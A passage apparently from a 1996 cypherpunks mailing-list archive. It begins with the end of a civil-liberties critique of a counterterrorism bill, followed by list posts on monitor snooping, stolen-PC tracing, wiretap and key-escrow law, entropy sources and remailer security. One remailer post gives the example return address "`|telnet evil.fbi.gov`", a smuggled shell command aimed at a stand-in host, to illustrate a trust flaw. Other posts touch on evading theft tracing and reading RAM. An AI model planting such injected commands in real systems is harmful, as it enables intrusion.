of an explosive or firearm with intent to endanger person or property
would be deportable as a terrorist.  Similarly, an individual who
raised funds solely for the lawful medical services provided by any
organization that has also engaged in terrorism would be deportable as
a terrorist.

	The new law explicitly provides that a "terrorist organization"
is defined without reference to lawful activities of the group.  It
defines "terrorist organization" as "any organization engaged, or which
has a significant subgroup which engages, in terrorism activity,
regardless of any legitimate activities conducted by the organization
or its subgroups." Section 202(a)(B)(iv). Under this definition, any
alien who provided money for the peace process to Yasir Arafat's
Palestine Liberation Organization would be deportable, notwithstanding
that the peace process is lawful, and that the United States government
itself has provided the PLO with funds for that purpose, and asked
others to do the same.  The PLO's subgroups include the Democratic
Front for the Liberation of Palestine and the Popular Front for the
Liberation of Palestine, both of whom the government charges are
engaged in terrorism.[fn0]  Thus, aliens would be deportable for doing
what the U.S. government itself is currently doing, and asking others
to do.





3.	Deportation of Terrorist Group "Representatives"





	The new law also permits the President, together with the
Secretary of State and Attorney General, to deport any alien they
choose simply by identifying him or her as a "representative" of a
"terrorist organization," in an unreviewable determination. Section
202(a)(B)(i) makes deportable "representatives" of "any terrorist
organization designated by proclamation by the President after he has
found such organization to be detrimental to the interests of the
United States."  Such a designation would likely be unreviewable, since
it provides no standards, and courts are unlikely to second-guess the
President on what is "detrimental to the interests of the United
States."

	The provision further authorizes either the Secretary of State
or Attorney General to designate any alien a representative of a
terrorist organization, and specifies that such determination "shall be
controlling and shall not be subject to review by any court."  Thus,
this statute effectively allows the President, together with the
Secretary of State or Attorney General, to deport any alien in the
United States through two unreviewable designations.  To afford
government officials such unreviewable power to single individuals out
for deportation is contrary to basic principles of due process.






4.	Analysis





	The "terrorism" provisions of the Immigration and Nationality
Act were added in 1990, when Congress finally repealed the
McCarran-Walter Act.  The 1990 Act was designed to repudiate the
principle of guilt by association that characterized the
McCarran-Walter Act.  This bill would reintroduce, in the name of
counter-terrrorism, the same principles of guilt by association.  It
would render aliens deportable for associational activity fully
protected by the First Amendment, and for supporting wholly lawful and
humanitarian activities.

	These provisions are unconstitutional on their face.  The
Supreme Court has long held that the First Amendment forbids punishment
for association alone.  The right of association means that all persons
in the United States have a right to support, join, recruit for, and
raise money for organizations that engage in both lawful and unlawful
activity.  Raising and contributing money is a core aspect of
associational and expressive First Amendment rights.[fn1]  Recruiting
members for a group is also protected.[fn2]  And the Supreme Court has long
held that in order for the government to punish an individual's
associational activities on behalf of a group, it must prove that the
individual specifically intended to further the unlawful ends of the
group . [fn3]  Yet under this bill, aliens are deportable solely for
supporting lawful activities of groups that also engage in unlawful
activity. 

	The Administration is aware that organizations denominated
"terrorist" often engage in lawful activity.  Indeed, just last year,
the Administration testified against a bill that would have made
membership in Hamas a ground for exclusion as a "terrorist" on such
grounds.  It argued that because Hamas engages in "widespread social
welfare programs" as well as terrorism, one could not presume that a
Hamas member was a "terrorist" without indulging in guilt by
association.[fn4]  Yet the Administration's bill would do just that for
countless groups.

	These provisions also raise substantial concerns about
selective enforcement.  They are written so broadly that any alien who
has supported any organization that has engaged in an act of property
destruction is deportable.  There are literally thousands of such
groups worldwide, and millions of such aliens here in the United
States.  Yet the government will almost certainly enforce this
provision selectively against those individuals who support groups the
government does not support. Thus, non-citizens who raise money for
Israel, which has certainly engaged in unlawful property damage
directed at civilians (see, for example, its collective punishment
policies pursuant to which it bulldozed homes and villages), would
technically be deportable under this provision, but it is of course
unlikely that they will be targeted.  History has shown that one man's
terrorist is another man's counterrevolutionary. A bill as broadly
written as this invites selective enforcement against unpopular groups.






B.	Section 201: Alien Terrorist Removal Procedures





	This provision would authorize the INS to deport aliens accused
of engaging in "terrorist activities," as that term is broadly defined
above, on the basis of secret evidence never disclosed to the alien or
his or her lawyer.






1. 	Current Law





	Deportation proceedings throughout our history have been
conducted on the basis of evidence disclosed to the alien, to afford
him an opportunity to defend himself.  The Supreme Court and lower
courts have held that due process -- which protects all aliens living
in the United States, whether here lawfully or unlawfully [fn5] -- does not
permit the use of secret evidence.[fn6] Accordingly, the INS has never used
undisclosed evidence to deport any alien from the United States.






2.	Secret Evidence Procedure





	The bill sets up a special court, comprised of 5 district court
judges designated by Chief Justice Rehnquist, to hear deportation cases
against aliens charged under the "terrorism" provisions discussed
above.  Section 502.

	To trigger the "secret evidence" procedure, the government need
only establish that the alien is subject to deportation under the
"terrorism" provisions, and that adherence to regular deportation
provisions would "pose a risk to the national security of the United
States."  Section 502(a).  Any time the government has classified
information that it does not want to reveal, it will be able to claim
that an ordinary deportation hearing would pose such a risk, because an
ordinary deportation hearing would require the disclosure of classified
information. If the court finds that the government has not made such a
showing, the government has a right to an immediate appeal, which shall
be "ex parte," meaning the alien and his lawyers have no right to
participate.  Section 502(d)(1).  The alien has no appeal.

	The procedure requires the government to provide the alien with
summaries of its classified information, but if the government shows
either that the alien's continued presence or the provision of the
summary "would likely cause serious and irreparable harm to the
national security or death or serious bodily injury to any person."
Section 502(e)(2).  If the government makes that showing, it may
proceed by undisclosed evidence, without any summary.  It is likely
that the government will often be able to make such claims, because all
it needs to do is state that an informant is involved, that a summary
would disclose his or her identity, and that the informant's safety
would be endangered.

	Where ex parte evidence is used, the alien and his lawyers have
no opportunity to see it, and the immigration judge may hear argument
based on the evidence outside the presence of the alien and his
lawyers.  Section 502(j), (l).  If the judge declines to accept such
secret evidence, the Justice Department may take a one-sided appeal to
the Court of Appeals, which will consider the government's appeal
without the participation of the alien or his lawyers.[fn7]
	In such a special removal proceeding, the alien is barred from
seeking to suppress any evidence, even if it was illegally obtained,
and has no right to discover information derived from electronic
surveillance, which the government may use even if obtained in
violation of the law restricting electronic surveillance.  Section
501(b).  Ordinarily, any person in any proceeding can move to suppress
such evidence on the ground that it was unlawfully obtained.  18 U.S.C.
¤3504.  That statute is specifically made inapplicable to these
deportation proceedings. Section 501(b).[fn8]

	The bill provides for immediate detention without bail of all
aliens subject to this procedure.  Aliens here on student visas,
tourist visas, or special labor visas would be denied any hearing
regarding their detention.  Lawful permanent resident aliens would get
a hearing, but the government would be able to use classified
information, and instead of the government having to prove that there
are grounds for detention, the alien would have to prove that there is
no basis for detention.  Section 502(b).[fn9]






3.	Analysis





	It is a cardinal rule of due process that evidence used against
one party must be disclosed to that party.  This rule applies in
criminal and civil proceedings.   The government is thus seeking to
exercise an unprecedented power in authorizing reliance on secret
evidence.

	Under the law, the government need only show that the presence
of the alien or revealing the information presents a risk of serious
harm to national security or any person.  If such a showing were
sufficient to justify using secret evidence in criminal trials,
virtually every criminal case involving an informant would be heard on
the basis of secret evidence.  Yet it is well-established that in no
criminal trial -- even involving the most heinous of crimes, the most
top secret information, and the most dangerous of threats -- may the
government use undisclosed evidence.  If it wants to use an informant's
testimony, it must reveal his or her identity.  If it wants to rely on
classified information, it must reveal it in court.  Yet under this
law, the government would be permitted to use secret evidence against
an alien who did no more than provide humanitarian aid, as long as part
of its evidence against the alien is based on classified information.

	Moreover, the law allows the government to use undisclosed
evidence without a summary not only where revealing the information
would pose a risk, but also where revealing the information would pose
* no * risk, but the alien's presence poses a risk.  Section
502(e)(2)(A)., Thus, the law allows the government to use secret
evidence against aliens it claims are dangerous even where there would
be no danger posed by disclosing the evidence.  This provision simply
authorizes the government to use secret evidence where the only reason
for doing so is to deny the alien a fair opportunity to defend himself.

	As noted above, courts have consistently declared
unconstitutional INS attempts to use secret evidence against aliens,
even where the government claims that national security is at stake.
This procedure is equally unconstitutional.

	Moreover, the government has made no showing that such a
procedure is necessary.  The nation has survived for more than 200
years without secret trials.






III.	RESTRICTIONS ON FUND-RAISING BY ALL U.S. PERSONS





	Title III of the bill imposes unprecedented restrictions on
humanitarian fundraising for any organization designated by the
President as a terrorist group.  This provision reaches the activities
of U.S. citizens as well as non-citizens, and directly infringes on
First Amendment protected activity.






A.	Current Law





	It is already illegal to provide money for the terrorist acts
of any group or person.  Congress passed a bill prohibiting such
activity in the 1994 crime bill.  18 U.S.C. ¤2339A.  What this bill
adds is a prohibition on fundraising that would otherwise be legal,
namely fundraising for the lawful activities of an organization that
has engaged in terrorism.






B.	Designation of Terrorist Groups




	
	Under Section 2339B(c), the President may designate any
foreign organization as a terrorist organization if he finds that the
organization engages in terrorism activity as defined in the
immigration provisions and that the organization's terrorism activities
"threaten the national security, foreign policy, or economy of the
United States."  As noted above, the immigration provision definition
of "engage in terrorism activity" is extremely broad, and includes not
only any unlawful property damage, but also any fundraising for the
lawful activities of another organization that has engaged in property
damage.  Thus, this definition places virtually no constraints on the
groups the President could designate.

	In addition, the bill makes the President's designation
"conclusive," and provides that "[n]o question concerning the validity
of the issuance of such designation may be raised by a defendant in a
criminal prosecution."  Section 2339B(c)(6). Thus, even in the
ludicrous instance of the President designating the Girl Scouts as a
terrorist organization, a person charged with raising funds for the
group could not challenge the designation.






C.	Fundraising for Lawful Activities Criminalized





	The bill criminalizes any fundraising or monetary support of any
designated group.  In theory, it provides an if the individual obtains a
prior license from the Secretary of the Treasury.  To obtain a license,
however, the individual must prove that the funds will be used
exclusively for lawful purposes, and will not be used to offset a
transfer of other funds to be used in terrorist activity.  Section
2339B(e)(3).  In addition, the individual must make available to the
Secretary's inspection his books and records, and the books and
records of the recipient organization.  Section 2339B(e)(4).

	Under this law, it would have been a crime to give money to the
ANC during Nelson Mandela's speaking tours here, unless the individual
made his or her books and the books of the ANC available to the
Secretary of the Treasury for inspection.10 (Of course, under the
preceding immigration provisions, Nelson Mandela and any alien who
contributed to his cause would be deportable, even if they could prove
that the money went solely for lawful causes).

	This bill authorizes up to 10 years' imprisonment for any
violation.  It also subjects anyone who gets a license and thereafter
fails to make available to the Secretary their books or the books of
the recipient organizations liable to a $50,000 fine, or twice the
amount of money that would have been documented, whichever is larger.
Section 2339B(i).

	The law also allows the government to bar discovery of
classified information by defendants in civil proceedings for
injunctions under this Act, and to use summaries of classified
information or redacted documents affirmatively against defendants.
Section 2339B(l).






D.	Analysis





	This bill raises several constitutional concerns.  First, it
criminalizes constitutionally protected fundraising for lawful
activities.  The loophole it creates to allow such fundraising is
illusory, given the requirement that the foreign organization must open
its books to the Secretary of the Treasury.

	Second, even if the licensing option were not illusory, it
imposes an unconstitutional prior restraint, because it requires approval
before the First Amendment activity can be engaged in. The First
Amendment prohibition on prior restraints means that the government is
restricted to punishing speech or associational activity after the fact,
and cannot require prior licensing..

	Third, the licensing requirement reverses the burden of proof
constitutionally required by the First Amendment. The First Amendment
bars the government from prohibiting fundraising for an organization
unless the government can prove that the money is specifically intended
for unlawful activities.  Under this bill, guilt is presumed, and the
individual seeking a license must prove that the money is intended for,
and will be used only for, lawful activities.

	Fourth, the bill gives the President judicially unreviewable
authority to designate prohibited organizations, and that determination
is conclusive in court.  Moreover, the definition of terrorist
organization, taken from the immigration provisions discussed above, is
so broad as to invite selective enforcement.
	Fifth, the provisions permitting the government to use
summaries of classified information against defendants and barring
defendants from discovering classified information that would be
helpful to their case raise significant due process concerns, for
reasons discussed above in Section II.B., addressing the alien
terrorist removal provisions.


------------------------------------------------------------------------








Footnotes







0  Executive Order (January 24, 1995).

1  See Citizens Against Rent Control v. Berkeley, 454 U.S. 290, 295-96
(1981) (monetary contributions to a group are a form of "collective
expression" fully protected by the right of association); Federal
Election Comm. v. National Conservative Political Action Comm., 470
U.S. 480, 495 (1985) (same); Roberts v. United States Jaycees, 468 U.S.
609, 626-27 (1984) (First Amendment protects Jaycees' "fundraising");
Village of Schaumburg v. Citizens for a Better Environment, 444 U.S.
620, 632-33 (1980) (First Amendment protects charitable solicitation of
funds).

2  Staub v. City of Baxley, 355 U.S. 313 (1958) (striking down
restriction on solicitation of members for unions and other
organizations as violation of First Amendment); City of Watseka v.
Illinois Public Action Council, 796 F.2d 1547, 1558-59 (7th Cir. 1986)
(upholding award of damages for First Amendment violation based in part
on organization's "inability to recruit new members").

3  In Healy v. James, 408 U.S. 169, 186 (1972), the Supreme Court held
that:

	'guilt by association alone, without [establishing] that an
	individual's association poses the threat feared by the
	Government,' is an impermissible basis upon which to deny
	First Amendment rights.  The government has the burden of
	establishing a knowing affiliation with an organization
	pursuing unlawful aims and goals, and a specific intent to
	further those illegal aims. 

(citations omitted, emphasis added).  Under this principle, the Court
has struck down statutes barring Communist Party members from public
and private employment, Keyishian v. Board of Regents, 385 U.S. 589,
606-07 (1967); Elfbrandt v. Russell, 384 U.S. 11, 17 (1966); United
States v. Robel, 389 U.S. 258; ballot access, Communist Party of
Indiana v. Whitcomb, 414 U.S. 441, 448-49 (1974); the right to travel
abroad, Aptheker v. Secretary of State, 378 U.S. 500 (1964); and the
practice of law.  Baird v. State Bar of Arizona, 401 U.S. 1 (1971);
Schware v. Board of Bar Examiners, 353 U.S. 232 (1957).

4  Written Testimony of Mary A. Ryan, Assistant Sec. for Consular
Affairs, Dept. of State, Before the Subcomm. on International Law,
Immigration and Refugees of the House Judiciary Comm., Feb. 23, 1994,
at 7.  See also Written Testimony of Chris Sale, INS, same hearing, at
9.

5  As the Supreme Court stated in Mathews v. Diaz, 426 U.S. 67, 77
(1976):

	There are literally millions of alines within the
	jurisdiction of the United States.  The Fifth Amendment, as
	well as the Fourteenth Amendment, protects every one of
	these persons from deprivations of life, liberty, or
	property without due process of law.  Even one whose
	presence in this country is unlawful, involuntary, or
	transitory is entitled to that constitutional protection.

6  Kwong Hai Chew v. Colding, 344 U.S. 590 (1953) (holding that INS
could not subject returning permanent resident alien to "summary
exclusion" procedure in which INS would rely on secret evidence);
Rafeedie v. INS, 795 F. Supp. 13 (D.D.C. 1992) (holding
unconstitutional the INS's attempt to expel a permanent resident alien
on the basis of undisclosed classified information); American-Arab
Anti-Discrimination Comm. v. Reno, No. CV 87-2107-SVW(Kx), Slip op.
(C.D. Cal. Jan. 25, 1995) (enjoining INS, on due process grounds, from
relying on undisclosed information to deny aliens legalization to
permanent resident status), appeal pending (9th Cir.).

7  The bill may also change the standard of proof.  In deportation
hearings, it has long been established that the government must prove
its case by "clear, unequivocal, and convincing evidence."  Woodby v.
INS, 385 U.S. 276 (1966).  Under this bill, however, the government
would need to prove its case only by "clear and convincing evidence."
Section 502(m).  It's not entirely clear that the government considers
this a change in the standard, however, for it states in its
section-by-section analysis that the same burden of proof would apply
as in other deportation proceedings.  The analysis does not explain the
statutory omission of the requirement that the evidence by
"unequivocal."

8  In fact, that statute is made inapplicable to all deportation
proceedings under the "terrorism" provisions, whether or not they
involve the use of undisclosed information.  Section 202(d).

9  The bill would also make any alien subjected to such a proceeding
ineligible for any discretionary relief otherwise available to
deportable aliens.  Section 501(c).  Thus, under this bill, a permanent
resident alien who provided medical supplies to a hospital run by an
organization that had also engaged in an act of property destruction
could be deported on the basis of secret evidence, and would have no
opportunity even to apply for discretionary relief.

10  The ANC was routinely listed as a "terrorist group" in official
government documents prior to its becoming part of the South African
government.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Fri, 15 Mar 1996 11:33:56 +0800
To: Alan Horowitz <JonWienke@aol.com
Subject: Re: Beat Remote Monitor Snooping?
Message-ID: <m0tx6kz-0008zUC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:46 PM 3/13/96 -0500, Alan Horowitz wrote:
>Visual contrast is not the same thing as frequency diffrence. It is quite
>easy to measure extremely small changes of phase.  As in, your
>plain-vanilla FM receiver.

However, that's not how SVGA CRT's do it.  NTSC (TV video) modulation is done by phase modulation of the 3.579545 MHz subcarrier.  SVGA has three different baseband analog signals feeding three electron beams.  

Even so, they still should be able to pick up SVGA with a little tinkering.

> What's his name put this stuff together in the
>mid 1930's.

Ed Armstrong


 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Thu, 14 Mar 1996 13:52:19 +0800
To: JonWienke@aol.com
Subject: Re: Beat Remote Monitor Snooping?
In-Reply-To: <960312193120_444876976@emout09.mail.aol.com>
Message-ID: <Pine.SV4.3.91.960313223844.19338E-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


Visual contrast is not the same thing as frequency diffrence. It is quite
easy to measure extremely small changes of phase.  As in, your
plain-vanilla FM receiver. What's his name put this stuff together in the
mid 1930's. 

Nice try, but no cigar.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Fri, 15 Mar 1996 11:45:27 +0800
To: adam@lighthouse.homeport.org (Adam Shostack)
Subject: Re: Remailer passphrases
Message-ID: <199603140644.WAA05138@netcom6.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:13 AM 3/14/96 -0600, Alex Strasheim wrote:
>(I have no idea how hard it would be to steal information from a running
>machine's ram -- or if it's even possible).

It is probably possible.  Put a clip across the CPU chip, and take over
from it by raising it's chip disable will work with some microprocessors. 
However, the proper application of various kinds of rubber hose to the
operator should make that kind of attack unnecessary.

"Perfect" Forward Security or some approximation helps protect the operator
against such an attack by reducing the amount of compromised material, and
therefore the incentive.

Regards - Bill


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 14 Mar 1996 13:41:33 -0500
To: cypherpunks@toad.com
Subject: Re:LACC: PC Phones Home?
Message-ID: <ad6ceece080210040306@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:41 AM 3/14/96, Jim McCoy wrote:

>A few questions:
>
>1- How does the PC know where it is?
>2- How does the PC know it has been stolen?

The Web reveals all:

1. If the PC has been _reported_ stolen by the owner, any call from that PC
triggers a phone trace, says the company.

2. See #1 (the key is that owner must call and report a particular PC stolen).


>Since this is a software product I am assuming that the answer to #1
>is the use of CallerID on the line when the software calls, which is
>defeated by the use of line blocking by the thief.  The obvious answer
>to #2 seems to me to have the system call the CompuTrace office at
>odd intervals to see if it has been reported stolen yet...
>
>Obvious solution for potential thieves: wipe the disks and reinstall
>an OS once you steal a PC.  This should be done anyway to remove any
>bits of data which might identify the original owner.

These points assume the thief is relatively sophisticated and that the
thief is aware that the CompuTrace system is installed. I suspect that
neither is likely, at least not until the system gets sufficient publicity
so that the first thing thieves and purchasers of suspected-to-be-hot PCs
do is to make plans to avoid this (reformat disks, etc.).

I think the scenario I described in my earlier post on this topic covers
about 97% of all PC thefts: relatively unsophisticated thieves who
warehouse the merchandise until buyers are found. The buyers, in turn, are
also relatively unsophisticated. They may be immigrant businesses looking
for a really good deal on PCs, they may be school systems strapped for
cash, they may be your mother buying her first PC at a flea market.

And they may be any of us, buying a surplus PC.

In none of these cases is the user likely to take steps to disable Caller
ID (and the company may actually do old-fashioned tracing).

>Conclusion:  Yet another useless piece of software riding the
>computer security bandwagon.

I'm not convinced it's software I would want to buy, but it fills a niche,
I think. And it's definitely not the snake oil we've seen recently, as it
makes no outrageous technical claims and seems to be going after a limited
market.

--Tim May


Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 15 Mar 1996 11:37:42 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Leahy bill, legalize crypto
Message-ID: <199603140706.XAA20911@ix10.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:14 PM 3/13/96 -0800, Tim wrote:
>One reason Washington pushed for the Wiretap Act (aka Digital Telephony)
>was because digital switches have made conventional methods of wiretapping
>and pen registers harder and harder to do. (I'm not a phone phreaker
>expert, as some of you no doubt are, so I don't know the details of how
>wiretaps were done prior to the advent of digital switches...I picture
>wires connected to the back of PBX systems, and I presume the ESS systems
>and their ilk changed this dramatically.)

There are different places you can do your wiretap, depending on
convenience, weather, observability, whether you've got a warrant, etc.
ESSs don't really change the pair of wire coming from your house
out to the telephone pole, over to your local wire center, and
into the distribution system that eventually connects them to the switch.
You've still got a pair of copper wires.  On the other hand,
underground wiring is harder to get at, and pair gain systems such as
Subscriber Loop Carrier bring some of the multiplexing out to your block
instead of all the way back to the phone office, and ESSs do make those
more cost-effective.  Connections from PBXs are also harder to tap than
individual phone lines, since your phone call may be on any of the (probably
virtual) circuits going from the PBX to the phone office.

>The main way they blew it is that the Wiretap Act ostensibly does not cover
>end-to-end encryption, especially as computers are used in place of
>telephones. 

I don't think they blew it there, although the EFF's work against S.266 a few
years back really hurt them.  There are two ways to get oppressive laws
enacted -
wholesale, or bit by bit.  A wholesale ban would have affected a lot of people,
and had substantial constitutional difficulties.  On the other hand,
a mere regulation telling the already regulated telephone companies that they
have to do a bit more free work in return for their monopoly status
isn't a big constitutional stretch, and mainly annoys phone companies
rather than end consumers.  Also, it's far easier to enforce regulations on
phone companies - there are bureaucrats in place to do it, you can kick them
around
in all sorts of ways if they don't cooperate, and it gets you most of your
wiretapping and enforcement done wholesale rather than retail.

(It's still major slime, of course :-)
#--
#			Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, +1-415-442-2215 pager 408-787-1281
# "At year's end, however, new government limits on Internet access threatened
# to halt the growth of Internet use.  [...] Government control of news media 
# generally continues to depend on self-censorship to regulate political and
# social content, but the authorities also consistently penalize those who
# exceed the permissable."  - US government statement on China...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David K. Merriman" <merriman@arn.net>
Date: Thu, 14 Mar 1996 13:39:14 -0500
To: cypherpunks@toad.com
Subject: Anon email accounts available
Message-ID: <2.2.32.19960313171431.00682f34@arn.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Just letting folks know that shellback.com is offering anon email accounts. Price is $5/month, prepaid via cash or money order. Weekly notices starting 30 days before account expires. See our page at

http://www.shellback.com/anonmail.htm
(yes, we're really leaving the last 'l' off :-)

Also want to let folks know that the remailer is not _yet_ functioning (saw a couple messages try to fly through while setting up the mail server). Real Soon Now. Honest.

Dave Merriman

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMUbmAMVrTvyYOzAZAQEE0QP/Tg5wqn49bFVx8hwYbGP9UK3SsU7bgh+U
yt6rZRrxTfIpJk01emWY6SXPL1XjCSSV8YXnukaScJdpmIJ9vRZkG1wpznNFWeER
GtLP8YTdcyQxOzC7qY9UWwebweVTNjwH998x09jiUhp2wY1qkTjHqk2qMxSStZrZ
2U1IQc/BDt0=
=uH+x
-----END PGP SIGNATURE-----
-------------------------------------------------------------
"Giving money and power to government is like giving 
whiskey and car keys to teenage boys."
                    P. J. O'Rourke (b. 1947), U.S. journalist.
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
http://www.shellback.com/personal/merriman/index.htm






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raymond Mereniuk <Raymond@advcable.com>
Date: Thu, 14 Mar 1996 17:16:40 +0800
To: cypherpunks@toad.com
Subject: Re:LACC: PC Phones Home? -Reply
Message-ID: <s1475a8e.024@zed.ca>
MIME-Version: 1.0
Content-Type: text/plain


 Jim Writes
>A few questions:
>1- How does the PC know where it is?
>2- How does the PC know it has been stolen?
...deleted text...
> #1 is the use of CallerID on the line when the software calls,
>which is defeated by the use of line blocking by the thief.  The 
...deleted text...
>Obvious solution for potential thieves: wipe the disks and reinstall
>an OS once you steal a PC.  This should be done anyway to remove any
>bits of data which might identify the original owner.
>Conclusion:  Yet another useless piece of software riding the
>computer security bandwagon.
>jim

You should visit their web site at http://absolute.com for more
information as they can do what they say they can.  

A high level format does not change bad track assignments and neither
will fdisk so if you hide something in an assigned bad track
(cylinder or cluster or whatever it is called) nothing will see it. 
Now all you have to do is activiate the software in the bad track, I
don't know how that is done (trade secret??) but maybe someone has
figured out how to do it.

Calls to 1-800 numbers can not block caller-ID, call-blocking will
not stop the calling number from being passed to the appropriate
equipment setup at the receiving end. 

Maybe these people have developed the ultimate virus, you can't
detect it, you can't remove it, and you don't know it even exists.

I don't really know how well this software package works but your
comments had many errors.


Normally Lurking

Raymond






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@echeque.com
Date: Fri, 15 Mar 1996 12:35:19 +0800
To: jim bell <WlkngOwl@UNiX.asb.com>
Subject: Re: Why escrow? (was Re: How would Leahy bill affect crypto
Message-ID: <199603140748.XAA27068@mail1.best.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:27 PM 3/13/96 -0800, jim bell wrote:

> There is nothing in Leahy's bill which appears to prohibit the 
> escrow agent from informing the key holder of a request/demand for the key; 

On the contrary:  See section 2802(c)(4)

Section 2802(c)
>  "(c) REQUIREMENTS FOR RELEASE OF DECRYPTION KEY TO 
>       INVESTIGATIVE; OR LAW ENFORCEMENT OFFICER.-
>
>   "(1) CONTENTS OF WIRE AND ELECTRONIC COMMUNICATIONS.-
>   A key holder is authorized to release a decryption key 
>   or provide decryption assistance to an investigative or 
>   law enforcement officer authorized by law to conduct 
>   electronic surveillance under chapter 119, only if-
>   [...] or "(ii) a certification in writing by a person 
>   specified in section 2518(7) [...] stating that- "(I) 
>   no warrant or court order is required by law;
>   [...]
>    "(4) NONDISCLOSURE OF RELEASE.-No key holder, officer, employee, or
>   agent thereof shall disclose the key release or provision of
>   decryption assistance pursuant to subsection (b), except as may
>   otherwise be required by legal process and then only after 
>   prior notification to the Attorney General or to the principal 
>   prosecuting attorney of a State or any political subdivision of 
>   a State, as may be appropriate.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JonWienke@aol.com
Date: Thu, 14 Mar 1996 13:36:52 -0500
To: cypherpunks@toad.com
Subject: Re: entropy masking (was Re: Multiple spinners as sources of entropy?)
Message-ID: <960313234757_350663563@emout09.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


In a message dated 96-03-13 18:35:51 EST, Matt Blaze writes:

>I would go even further than this.  I wouldn't trust ANY
>environmentally-based random source (cycle spinner, keyboard
>timer, disk noise, whatever) against adversaries on the
>same system.

In DOS, the keyboard, mouse, and disk drives run on interrupts, not timers.
 If you use a timer as a spinner, such as the Windows GetCurrentTime()
function, (I MSec. resolution) and check its value each time a key is pressed
and released, It would appear that the results should be quite random,
because the keystroke is not processed in conjunction with the timer, but
rather whenever the interrupt occurs.  My tests in this area indicate that
any 8 bit value can be achieved with this method, with a fairly uniform
distribution.  My tests are not thorough (I haven't sat down and typed for 2
hours to test the distribution of the output), but results look reasonably
good so far.

Jonathan Wienke




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Thu, 14 Mar 1996 13:43:25 -0500
To: cp@proust.suba.com (Alex Strasheim)
Subject: Re: Remailer passphrases
In-Reply-To: <199603131713.LAA00824@proust.suba.com>
Message-ID: <199603140450.XAA12195@homeport.org>
MIME-Version: 1.0
Content-Type: text


Alex Strasheim wrote:

| If we ignore the obvious problem (ie., no one is going to put much effort
| or expense into running a free remailer), wouldn't splitting the remailer
| across two machines help fix the security problem? 

	This is a long standing debate in the security community.
Some folks like multiple box security.  Others point out that using
two boxes means both need to be well secured, and you have twice as
many places to make mistakes.

| Suppose one unix box accepts the mail and puts it a queue directory.  Then
| a second box periodically grabs files from the first box's queue with ssh
| (the second box initiates the connection), processes them, and then passes
| them out to the smtp server on the first box.  The second box doesn't
| accept incoming connections on any port except for the ssh port so there
| are no sendmails or httpds to hack.

	Lets say the boxes are called workstation and blackbox.  If I
break into workstation, I can provide bogus files for blackbox.  Since
blackbox extends some trust to workstation, it might not be expecting
to see a message with a return address of "`|telnet evil.fbi.gov`".

	I'd argue that setting up a simple mailer which uses
workstation as a relay host gives you as much security, and lessens
your dependance on workstation, which we expect will be comprimised.
(Of course we expect ws to be comprimised.  Why else are we setting up
bb as a seperate machine?)

| The remailer files could be running on a cfs drive (with nfs/cfs only
| accepting connects from localhost), and you could disable getty so that it
| would be hard to physically grab the machine and read the contents of the
| disk.  If you had enough ram you wouldn't need a swap file, so there'd be
| nothing there for someone who grabbed the machine.  If you set the machine
| up while it's plugged into a small lan that's not connected to the net no
| one could come in and hide something before you had secured everything. 

	Turning of getty and removing the swap file strike me as a bit
extreme.  A panic login system, otoh, that accepts a bad password and
wipes the disk, might not be a bad idea.  (Of course, if this becomes
popular, the bad guys will just rip out your disk and read it on
another machine.)

| I know an attacker could interrupt service, and I'd guess that a skillful
| attacker could probably find a way to grab the cfs and remailer
| passphrases if he could grab the machine and the control the site
| physically (to work on it while it's running) for awhile, but how would an
| attacker come in over the net and hack the remailer box?  

	Be awful tough if it only listens to ssh & smtp.  Are you sure
your kernel doesn't do anything bogus with ICMP?  Data overflows in
ssh or smap?  DNS, syslogd, tty overloads?

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Strasheim <cp@proust.suba.com>
Date: Fri, 15 Mar 1996 11:50:18 +0800
To: adam@lighthouse.homeport.org (Adam Shostack)
Subject: Re: Remailer passphrases
In-Reply-To: <199603140450.XAA12195@homeport.org>
